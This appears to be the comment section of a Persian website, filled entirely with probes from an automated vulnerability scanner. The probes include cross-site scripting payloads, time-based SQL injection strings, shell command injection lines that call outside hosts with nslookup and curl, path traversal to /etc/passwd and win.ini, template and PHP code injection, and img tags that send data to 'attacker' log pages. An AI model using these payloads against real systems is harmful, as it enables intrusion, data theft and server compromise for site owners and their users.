  1402/04/29 09:53
  555<input autofocus onfocus=aQDN(9170)>
  1402/04/29 09:53
  %F6<img zzz onmouseover=raVy(92281) //%F6>
  1402/04/29 09:53
  <input autofocus onfocus=raVy(9958)>
  1402/04/29 09:54
  <a HrEF=http://xss.bxss.me></a>
  1402/04/29 09:54
  <a HrEF=http://xss.bxss.me></a>
  1402/04/29 09:54
  <a HrEF=jaVaScRiPT:>
  1402/04/29 09:54
  }body{zzz:Expre/**/SSion(raVy(9663))}
  1402/04/29 09:54
  <a HrEF=jaVaScRiPT:>
  1402/04/29 09:54
  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
  1402/04/29 09:54
  n211q
  <ScRiPt >raVy(9764)</ScRiPt>
  1402/04/29 09:54
  555}body{zzz:Expre/**/SSion(aQDN(9771))}
  1402/04/29 09:54
  <WAONB8>Z2KEQ[!+!]</WAONB8>
  1402/04/29 09:54
  <ifRAme sRc=9490.com></IfRamE>
  1402/04/29 09:54
  555j6Irb
  <ScRiPt >aQDN(9170)</ScRiPt>
  1402/04/29 09:54
  <a7vbFiW x=9396>
  1402/04/29 09:54
  <img sRc='http://attacker-9388/log.php?
  1402/04/29 09:54
  555<WDY2VA>GYI2Z[!+!]</WDY2VA>
  1402/04/29 09:54
  <aP5km4e<
  1402/04/29 09:54
  555<ifRAme sRc=9283.com></IfRamE>
  1402/04/29 09:54
  555<aS82Em2 x=9771>
  1402/04/29 09:54
  555<img sRc='http://attacker-9064/log.php?
  1402/04/29 09:54
  555<asb2iaO<
  1402/04/29 09:54
  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
  1402/04/29 09:55
  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  1402/04/29 09:56
  -1; waitfor delay '0:0:15' --
  1402/04/29 09:56
  -1); waitfor delay '0:0:15' --
  1402/04/29 09:57
  1 waitfor delay '0:0:15' --
  1402/04/29 09:58
  gXrh6wOd'; waitfor delay '0:0:15' --
  1402/04/29 09:58
  -5 OR 24=(SELECT 24 FROM PG_SLEEP(15))--
  1402/04/29 09:59
  -5) OR 679=(SELECT 679 FROM PG_SLEEP(15))--
  1402/04/29 10:00
  -1)) OR 448=(SELECT 448 FROM PG_SLEEP(15))--
  1402/04/29 10:00
  PQjdwrTq' OR 949=(SELECT 949 FROM PG_SLEEP(15))--
  1402/04/29 10:01
  lFNJUvPC') OR 995=(SELECT 995 FROM PG_SLEEP(15))--
  1402/04/29 10:01
  eFWlT55W')) OR 288=(SELECT 288 FROM PG_SLEEP(15))--
  1402/04/29 10:02
  *DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
  1402/04/29 10:03
  '||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  1402/04/29 10:03
  1'"
  1402/04/29 10:03
  1%C0%A7%C0%A2%2527%2522
  1402/04/29 10:03
  @@LYDTC
  1402/04/29 10:18
  &#xD;&#xA;
  1402/04/29 10:31
  555'"()&%<zzz><ScRiPt >4b4P(9216)</ScRiPt>
  1402/04/29 10:31
  &#xD;&#xA;
  1402/04/29 10:31
  '"()&%<zzz><ScRiPt >4b4P(9712)</ScRiPt>
  1402/04/29 10:31
  response.write(9586816*9239050)
  1402/04/29 10:31
  '+response.write(9586816*9239050)+'
  1402/04/29 10:31
  "+response.write(9586816*9239050)+"
  1402/04/29 10:31
  &#xD;&#xA;
  1402/04/29 10:31
  5559361837
  1402/04/29 10:31
  &#xD;&#xA;
  1402/04/29 10:31
  echo bthsxj$()\ prwsdp\nz^xyu||a #' &echo bthsxj$()\ prwsdp\nz^xyu||a #|" &echo bthsxj$()\ prwsdp\nz^xyu||a #
  1402/04/29 10:31
  &echo heuevt$()\ qkftte\nz^xyu||a #' &echo heuevt$()\ qkftte\nz^xyu||a #|" &echo heuevt$()\ qkftte\nz^xyu||a #
  1402/04/29 10:31
  |echo gpvdhe$()\ tstsce\nz^xyu||a #' |echo gpvdhe$()\ tstsce\nz^xyu||a #|" |echo gpvdhe$()\ tstsce\nz^xyu||a #
  1402/04/29 10:31
  IHugr5Bu
  1402/04/29 10:31
  (nslookup -q=cname hitqvwcxybeum3cbf7.bxss.me||curl hitqvwcxybeum3cbf7.bxss.me))
  1402/04/29 10:31
  $(nslookup -q=cname hitqjfcbhpfpy5ad64.bxss.me||curl hitqjfcbhpfpy5ad64.bxss.me)
  1402/04/29 10:31
  &nslookup -q=cname hitdzjwagilpqe8c39.bxss.me&'\"`0&nslookup -q=cname hitdzjwagilpqe8c39.bxss.me&`'
  1402/04/29 10:31
  &(nslookup -q=cname hitdfcvejahuecbfa0.bxss.me||curl hitdfcvejahuecbfa0.bxss.me)&'\"`0&(nslookup -q=cname hitdfcvejahuecbfa0.bxss.me||curl hitdfcvejahuecbfa0.bxss.me)&`'
  1402/04/29 10:31
  |(nslookup -q=cname hitikmvjglixc86177.bxss.me||curl hitikmvjglixc86177.bxss.me)
  1402/04/29 10:31
  `(nslookup -q=cname hitemzutblqlpdfeae.bxss.me||curl hitemzutblqlpdfeae.bxss.me)`
  1402/04/29 10:31
  ;(nslookup -q=cname hithyeqdyusehe3770.bxss.me||curl hithyeqdyusehe3770.bxss.me)|(nslookup -q=cname hithyeqdyusehe3770.bxss.me||curl hithyeqdyusehe3770.bxss.me)&(nslookup -q=cname hithyeqdyusehe3770.bxss.me||curl hithyeqdyusehe3770.bxss.me)
  1402/04/29 10:31
  ../../../../../../../../../../../../../../etc/passwd
  1402/04/29 10:31
  ../../../../../../../../../../../../../../windows/win.ini
  1402/04/29 10:31
  file:///etc/passwd
  1402/04/29 10:31
  &#xD;&#xA;
  1402/04/29 10:31
  ../
  &#xD;&#xA;
  1402/04/29 10:31
  to@example.com>
  bcc:074625.447-453643.447.77009.19558.2@bxss.me
  1402/04/29 10:31
  &#xD;&#xA;
  1402/04/29 10:31
  &#xD;&#xA;
  1402/04/29 10:31
  &#xD;&#xA;<esi:include src="http://bxss.me/rpb.png"/>
  1402/04/29 10:31
  &#xD;&#xA;
  1402/04/29 10:31
  ${10000053+10000191}
  1402/04/29 10:31
  http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
  1402/04/29 10:31
  1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
  1402/04/29 10:31
  Http://bxss.me/t/fit.txt
  1402/04/29 10:31
  http://bxss.me/t/fit.txt?.jpg
  1402/04/29 10:31
  /etc/shells
  1402/04/29 10:31
  c:/windows/win.ini
  1402/04/29 10:31
  &#xD;&#xA;
  1402/04/29 10:31
  bxss.me
  1402/04/29 10:31
  &#xD;&#xA;
  1402/04/29 10:31
  &#xD;&#xA;&n968736=v928726
  1402/04/29 10:31
  &#xD;&#xA;
  1402/04/29 10:31
  )
  1402/04/29 10:31
  !(()&&!|*|*|
  1402/04/29 10:31
  ^(#$!@#$)(()))******
  1402/04/29 10:31
  &#xD;&#xA;
  1402/04/29 10:31
  -1 OR 2+701-701-1=0+0+0+1 --
  1402/04/29 10:31
  -1 OR 2+44-44-1=0+0+0+1
  1402/04/29 10:31
  -1' OR 2+157-157-1=0+0+0+1 --
  1402/04/29 10:31
  -1' OR 2+166-166-1=0+0+0+1 or 'R0vkJdHd'='
  1402/04/29 10:31
  -1" OR 2+662-662-1=0+0+0+1 --
  1402/04/29 10:31
  '.gethostbyname(lc('hitnk'.'wekrtyuhb1042.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(86).chr(115).chr(68).'
  1402/04/29 10:31
  ".gethostbyname(lc("hithd"."utbduuce9a787.bxss.me."))."A".chr(67).chr(hex("58")).chr(113).chr(73).chr(102).chr(83)."
  1402/04/29 10:31
  &#xD;&#xA;
  1402/04/29 10:32
  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
  1402/04/29 10:32
  ';print(md5(31337));$a='
  1402/04/29 10:32
  ";print(md5(31337));$a="
  1402/04/29 10:32
  ${@print(md5(31337))}
  1402/04/29 10:32
  ${@print(md5(31337))}\
  1402/04/29 10:32
  '.print(md5(31337)).'
  1402/04/29 10:32
  '"()
  1402/04/29 10:32
  &#xD;&#xA;'&&sleep(27*1000)*myshlu&&'
  1402/04/29 10:32
  &#xD;&#xA;"&&sleep(27*1000)*iqtanu&&"
  1402/04/29 10:32
  &#xD;&#xA;'||sleep(27*1000)*sbzzxm||'
  1402/04/29 10:32
  &#xD;&#xA;"||sleep(27*1000)*lhejsd||"
  1402/04/29 10:32
  &#xD;&#xA;
  1402/04/29 10:32
  ctime
  sleep
  p0
  (I30
  tp1
  Rp2
  .
  1402/04/29 10:32
  HttP://bxss.me/t/xss.html?%00
  1402/04/29 10:32
  bxss.me/t/xss.html?%00
  1402/04/29 10:32
  &#xD;&#xA;
  1402/04/29 10:32
  &#xD;&#xA;
  1402/04/29 10:32
  "+"A".concat(70-3).concat(22*4).concat(106).concat(84).concat(115).concat(69)+(require"socket"
  Socket.gethostbyname("hitea"+"hqxltudec311c.bxss.me.")[3].to_s)+"
  1402/04/29 10:32
  '+'A'.concat(70-3).concat(22*4).concat(114).concat(74).concat(113).concat(75)+(require'socket'
  Socket.gethostbyname('hitox'+'vcpowoamc8177.bxss.me.')[3].to_s)+'
  1402/04/29 10:32
  if(now()=sysdate(),sleep(15),0)
  1402/04/29 10:32
  &#xD;&#xA;
  1402/04/29 10:32
  &#xD;&#xA;
  1402/04/29 10:32
  &#xD;&#xA;
  1402/04/29 10:32
  &#xD;&#xA;
  1402/04/29 10:32
  %DA%86%DA%AF%D9%88%D9%86%DA%AF%DB%8C-%D9%BE%DB%8C%D8%AF%D8%A7%DB%8C%D8%B4-%D8%AF%D8%B3%D8%AA%D9%85%D8%A7%D9%84-%DA%A9%D8%A7%D8%BA%D8%B0%DB%8C-%D8%AF%D8%B1-%D8%A8%D9%87%D8%AF%D8%A7%D8%B4%D8%AA-%D8%AE%D8%A7%D9%86%D9%88%D8%A7%D8%AF%D9%87
  1402/04/29 10:32
  %DA%86%DA%AF%D9%88%D9%86%DA%AF%DB%8C-%D9%BE%DB%8C%D8%AF%D8%A7%DB%8C%D8%B4-%D8%AF%D8%B3%D8%AA%D9%85%D8%A7%D9%84-%DA%A9%D8%A7%D8%BA%D8%B0%DB%8C-%D8%AF%D8%B1-%D8%A8%D9%87%D8%AF%D8%A7%D8%B4%D8%AA-%D8%AE%D8%A7%D9%86%D9%88%D8%A7%D8%AF%D9%87
  1402/04/29 10:32
  %DA%86%DA%AF%D9%88%D9%86%DA%AF%DB%8C-%D9%BE%DB%8C%D8%AF%D8%A7%DB%8C%D8%B4-%D8%AF%D8%B3%D8%AA%D9%85%D8%A7%D9%84-%DA%A9%D8%A7%D8%BA%D8%B0%DB%8C-%D8%AF%D8%B1-%D8%A8%D9%87%D8%AF%D8%A7%D8%B4%D8%AA-%D8%AE%D8%A7%D9%86%D9%88%D8%A7%D8%AF%D9%87/.
  1402/04/29 10:32
  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
  1402/04/29 10:32
  xfs.bxss.me
  1402/04/29 10:32
  '"
  1402/04/29 10:32
  <!--
  1402/04/29 10:32
  &#xD;&#xA;'"()&%<zzz><ScRiPt >obFf(9972)</ScRiPt>
  1402/04/29 10:32
  '"()&%<zzz><ScRiPt >obFf(9918)</ScRiPt>
  1402/04/29 10:32
  &#xD;&#xA;9457538
  1402/04/29 10:32
  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
  1402/04/29 10:32
  bfg2834<s1﹥s2ʺs3ʹhjl2834
  1402/04/29 10:32
  bfgx1944%C0%BEz1%C0%BCz2a%90bcxhjl1944
  1402/04/29 10:32
  <%={{={@{#{${dfb}}%>
  1402/04/29 10:32
  <th:t="${dfb}#foreach
  1402/04/29 10:32
  1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
  1402/04/29 10:32
  dfb{{98991*97996}}xca
  1402/04/29 10:32
  dfb[[${98991*97996}]]xca
  1402/04/29 10:33
  dfb__${98991*97996}__::.x
  1402/04/29 10:33
  "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
  1402/04/29 10:33
  &#xD;&#xA;<ScRiPt >obFf(9052)</ScRiPt>
  1402/04/29 10:33
  &#xD;&#xA;<WKAOZJ>C62RO[!+!]</WKAOZJ>
  1402/04/29 10:33
  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
  1402/04/29 10:33
  &#xD;&#xA;<ScRiPt
  >obFf(9084)</ScRiPt>
  1402/04/29 10:33
  &#xD;&#xA;<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9819></ScRiPt>
  1402/04/29 10:33
  &#xD;&#xA;<ScRiPt
  >obFf(9584)</ScRiPt>
  1402/04/29 10:33
  &#xD;&#xA;<svg  

  %A0onload=obFf(9954);>
  1402/04/29 10:33
  &#xD;&#xA;<isindex type=image src=1 onerror=obFf(9773)>
  1402/04/29 10:33
  &#xD;&#xA;<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9056'>
  1402/04/29 10:33
  &#xD;&#xA;<body onload=obFf(9081)>
  1402/04/29 10:33
  &#xD;&#xA;<img src=//xss.bxss.me/t/dot.gif onload=obFf(9312)>
  1402/04/29 10:33
  &#xD;&#xA;<img src=xyz OnErRor=obFf(9529)>
  1402/04/29 10:33
  &#xD;&#xA;<img/src=">" onerror=alert(9481)>
  1402/04/29 10:33
  %0D%0A%26%23%78%44%3B%26%23%78%41%3B%3C%53%63%52%69%50%74%20%3E%6F%62%46%66%289373%29%3C%2F%73%43%72%69%70%54%3E
  1402/04/29 10:33
  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  1402/04/29 10:33
  &#xD;&#xA;&lt;ScRiPt&gt;obFf(9082)&lt;/sCripT&gt;
  1402/04/29 10:33
  %F6<img zzz onmouseover=obFf(99971) //%F6>
  1402/04/29 10:33
  &#xD;&#xA;<input autofocus onfocus=obFf(9686)>
  1402/04/29 10:33
  <a HrEF=http://xss.bxss.me></a>
  1402/04/29 10:33
  <a HrEF=jaVaScRiPT:>
  1402/04/29 10:33
  &#xD;&#xA;}body{zzz:Expre/**/SSion(obFf(9524))}
  1402/04/29 10:33
  &#xD;&#xA;RdVmf
  <ScRiPt >obFf(9771)</ScRiPt>
  1402/04/29 10:33
  &#xD;&#xA;<WMFTLT>OJSLR[!+!]</WMFTLT>
  1402/04/29 10:33
  &#xD;&#xA;<ifRAme sRc=9042.com></IfRamE>
  1402/04/29 10:33
  1 waitfor delay '0:0:15' --
  1402/04/29 10:34
  &#xD;&#xA;<aGq17PS x=9727>
  1402/04/29 10:34
  &#xD;&#xA;<img sRc='http://attacker-9809/log.php?
  1402/04/29 10:34
  &#xD;&#xA;<azQil42<
  1402/04/29 10:34
  &#xD;&#xA;
  1402/04/29 10:34
  &#xD;&#xA;
  1402/04/29 10:34
  uzW4lKJ4'; waitfor delay '0:0:15' --
  1402/04/29 10:34
  6aePIYCy' OR 319=(SELECT 319 FROM PG_SLEEP(15))--
  1402/04/29 10:35
  JdFnEQPH') OR 838=(SELECT 838 FROM PG_SLEEP(15))--
  1402/04/29 10:35
  5N3q9TVI')) OR 668=(SELECT 668 FROM PG_SLEEP(15))--
  1402/04/29 10:36
  &#xD;&#xA;'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  1402/04/29 10:36
  1'"
  1402/04/29 10:36
  1%C0%A7%C0%A2%2527%2522
  1402/04/29 10:36
  @@zNfqd
  1402/04/29 10:36
  &#xD;&#xA;
  1402/04/29 10:37
  &#xD;&#xA;
  1402/04/29 10:42
  &#xD;&#xA;
  1402/04/29 10:43
  &#xD;&#xA;
  1402/04/29 10:48
  &#xD;&#xA;
  1402/04/29 12:26
  555'"()&%<zzz><ScRiPt >Mxiz(9440)</ScRiPt>
  1402/04/29 12:26
  '"()&%<zzz><ScRiPt >Mxiz(9143)</ScRiPt>
  1402/04/29 12:26
  5559919364
  1402/04/29 12:26
  bfg7855<s1﹥s2ʺs3ʹhjl7855
  1402/04/29 12:27
  bfgx7451%C0%BEz1%C0%BCz2a%90bcxhjl7451
  1402/04/29 12:27
  <%={{={@{#{${dfb}}%>
  1402/04/29 12:27
  <th:t="${dfb}#foreach
  1402/04/29 12:27
  1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
  1402/04/29 12:27
  dfb{{98991*97996}}xca
  1402/04/29 12:27
  dfb[[${98991*97996}]]xca
  1402/04/29 12:27
  dfb__${98991*97996}__::.x
  1402/04/29 12:27
  "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
  1402/04/29 12:27
  555<ScRiPt >Mxiz(9506)</ScRiPt>
  1402/04/29 12:28
  555<WSHCBO>EIDEZ[!+!]</WSHCBO>
  1402/04/29 12:28
  555<script>Mxiz(9240)</script>
  1402/04/29 12:28
  555<ScR<ScRiPt>IpT>Mxiz(9046)</sCr<ScRiPt>IpT>
  1402/04/29 12:28
  555<ScRiPt
  >Mxiz(9414)</ScRiPt>
  1402/04/29 12:28
  555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9784></ScRiPt>
  1402/04/29 12:28
  555<ScRiPt
  >Mxiz(9083)</ScRiPt>
  1402/04/29 12:28
  555<svg  

  %A0onload=Mxiz(9353);>
  1402/04/29 12:28
  555<isindex type=image src=1 onerror=Mxiz(9502)>
  1402/04/29 12:29
  555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9184'>
  1402/04/29 12:29
  555<body onload=Mxiz(9659)>
  1402/04/29 12:29
  555<img src=//xss.bxss.me/t/dot.gif onload=Mxiz(9368)>
  1402/04/29 12:29
  555<img src=xyz OnErRor=Mxiz(9493)>
  1402/04/29 12:29
  555<img/src=">" onerror=alert(9783)>
  1402/04/29 12:29
  %35%35%35%3C%53%63%52%69%50%74%20%3E%4D%78%69%7A%289402%29%3C%2F%73%43%72%69%70%54%3E
  1402/04/29 12:29
  555\u003CScRiPt\Mxiz(9001)\u003C/sCripT\u003E
  1402/04/29 12:29
  555&lt;ScRiPt&gt;Mxiz(9712)&lt;/sCripT&gt;
  1402/04/29 12:29
  %F6<img zzz onmouseover=Mxiz(93461) //%F6>
  1402/04/29 12:30
  555<input autofocus onfocus=Mxiz(9237)>
  1402/04/29 12:30
  <a HrEF=http://xss.bxss.me></a>
  1402/04/29 12:30
  <a HrEF=jaVaScRiPT:>
  1402/04/29 12:30
  555}body{zzz:Expre/**/SSion(Mxiz(9940))}
  1402/04/29 12:30
  5552sD4q
  <ScRiPt >Mxiz(9300)</ScRiPt>
  1402/04/29 12:30
  555<WEI9ZW>H2NE1[!+!]</WEI9ZW>
  1402/04/29 12:30
  555<ifRAme sRc=9397.com></IfRamE>
  1402/04/29 12:30
  555<at7TRxp x=9958>
  1402/04/29 12:30
  555<img sRc='http://attacker-9078/log.php?
  1402/04/29 12:30
  555<aYtPDHe<
  نظر خود را وارد نمایید.